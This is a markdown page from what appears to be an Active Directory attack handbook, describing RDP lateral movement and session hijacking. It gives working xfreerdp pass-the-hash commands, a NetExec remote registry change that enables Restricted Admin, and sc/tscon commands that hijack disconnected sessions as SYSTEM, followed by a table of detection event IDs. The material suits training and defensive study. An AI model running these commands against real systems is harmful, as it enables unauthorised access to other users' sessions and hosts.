attack-56-rdp-lateral-movement-and-hijacking.md (3150B)
1 --- 2 title: "Attack #56 — RDP Lateral Movement and Hijacking" 3 description: "RDP (Remote Desktop Protocol, port 3389) provides full GUI access to remote systems. Beyond standard RDP with credentials, attackers can hijack existing…" 4 category: active-directory 5 subcategory: "Lateral Movement" 6 tags: ["active-directory", "lateral-movement", "hashing"] 7 tools: ["NetExec", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #56 — RDP Lateral Movement and Hijacking.md" 11 --- 12 # ⚫ Attack #56 — RDP Lateral Movement & Hijacking 13 14 *** 15 16 ## 📖 How It Works 17 18 RDP (Remote Desktop Protocol, port 3389) provides full GUI access to remote systems. Beyond standard RDP with credentials, attackers can **hijack existing disconnected sessions** (session stealing) from a SYSTEM context without knowing the user's password — using `tscon.exe` to switch to another user's session. 19 20 *** 21 22 ## ⚙️ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Valid credentials or PtH** | For standard RDP | 27 | **SYSTEM access on target** | For session hijacking | 28 | **RDP enabled** | Port 3389 open | 29 30 *** 31 32 ## 💻 Full Commands 33 34 ### 🔴 Standard RDP 35 36 ```bash 37 # ── From Linux ──────────────────────────────────────────────────────────────── 38 xfreerdp /u:Administrator /p:'Password1' /v:10.10.10.10 /cert-ignore /dynamic-resolution 39 40 # ── PtH with RDP (Restricted Admin mode required) ──────────────────────────── 41 xfreerdp /u:Administrator /pth:2b576acbe6bcfda7294d6bd18041b8fe /v:10.10.10.10 42 43 # ── Enable Restricted Admin (for PtH to work) ──────────────────────────────── 44 nxc smb 10.10.10.10 -u Administrator -H <hash> -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f' 45 ``` 46 47 ### 🔴 RDP Session Hijacking 48 49 ```powershell 50 # ── As SYSTEM, list active sessions ─────────────────────────────────────────── 51 query user 52 # USERNAME SESSIONNAME ID STATE 53 # admin_user rdp-tcp#1 2 Disconnected ← target this 54 55 # ── Hijack disconnected session (as SYSTEM, no password needed) ─────────────── 56 # Create service to run tscon as SYSTEM: 57 sc create sesshijack binPath= "cmd.exe /c tscon 2 /dest:console" 58 net start sesshijack 59 # Or directly as SYSTEM: 60 tscon 2 /dest:console 61 # You are now in admin_user's RDP session 62 ``` 63 64 *** 65 66 ## 🛡️ Detection — Event IDs 67 68 | Event ID | Source | What to Look For | 69 |---|---|---| 70 | **4624** | Security Log | Logon Type 10 (RemoteInteractive) | 71 | **4778** | Security Log | Session reconnected — session hijacking indicator | 72 | **4779** | Security Log | Session disconnected | 73 | **1149** | TerminalServices-RemoteConnectionManager | Remote connection established | 74 75 *** 76 77 > ✅ **Attack #56 — RDP Lateral Movement complete.**